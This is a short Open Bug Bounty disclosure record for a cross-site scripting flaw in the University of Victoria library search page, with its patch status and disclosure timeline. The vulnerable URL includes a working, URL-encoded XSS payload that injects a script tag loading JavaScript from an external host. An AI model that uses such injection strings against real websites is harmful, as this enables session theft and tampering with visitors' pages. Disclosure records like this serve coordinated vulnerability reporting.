uvic.ca XSS vulnerability

2016-05-10T08:12:00
ID OBB:151089
Type openbugbounty
Reporter N008137
Modified 2017-05-13T13:36:00

Description

Vulnerable URL:
http://www.uvic.ca/library/search.php?q=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fopenbugbounty.org%2F1.js%3E&t;=4&p;=1&g;=true
Details:

Description| Value
---|---
Patched:| Yes, at 12.05.2017
Latest check for patch:| 12.05.2017 20:18 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 15777
VIP website status:| Yes
Check uvic.ca SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 10 May, 2016 08:12 GMT
Generic security notifications sent to website owner| 10 May, 2016 08:15 GMT
Vulnerability details disclosed by researcher| 31 May, 2016 09:11 GMT
Vulnerability patched by the website owner| 13 May, 2017 13:36 GMT